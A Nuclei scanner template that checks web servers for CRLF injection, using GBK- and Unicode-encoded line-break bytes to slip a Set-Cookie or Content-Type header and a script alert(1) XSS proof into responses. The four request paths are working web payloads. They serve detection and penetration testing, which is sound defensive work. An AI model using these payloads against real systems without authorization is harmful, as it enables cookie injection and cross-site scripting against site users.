id: gbk-crlf-injection

info:
  name: CRLF injection via GBK + (%C4%8A)
  author: reewardius
  severity: medium
  reference:
    - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
    - https://medium.com/@a7med.ctf/crlf-to-xss-8059ceefd349
    - https://secinthemid.com/vulnerabilities/crlf-injection-attack/
    - https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922
  tags: crlf
  
http:
  - method: GET
    path:
      - '{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:whoami=reewardius%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE'
      - '{{BaseURL}}/%EA%A8%8D%EA%A8%8ASet-Cookie:whoami=reewardius%EA%A8%8D%EA%A8%8A%EA%A8%8D%EA%A8%8A%EA%A8%8D%EA%A8%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE'
      - '{{BaseURL}}/%C4%8D%C4%8ASet-Cookie:whoami=reewardius%C4%8D%C4%8A%C4%8D%C4%8A%C4%8D%C4%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE'
      - '{{BaseURL}}/%E5%98%8D%E5%98%8AContent-Type:%20text/html%E5%98%8D%E5%98%8AX-Content-Type-Options:%20undefined%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE'
      
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1)"
          
      - type: word
        part: header
        words:
          - "text/html"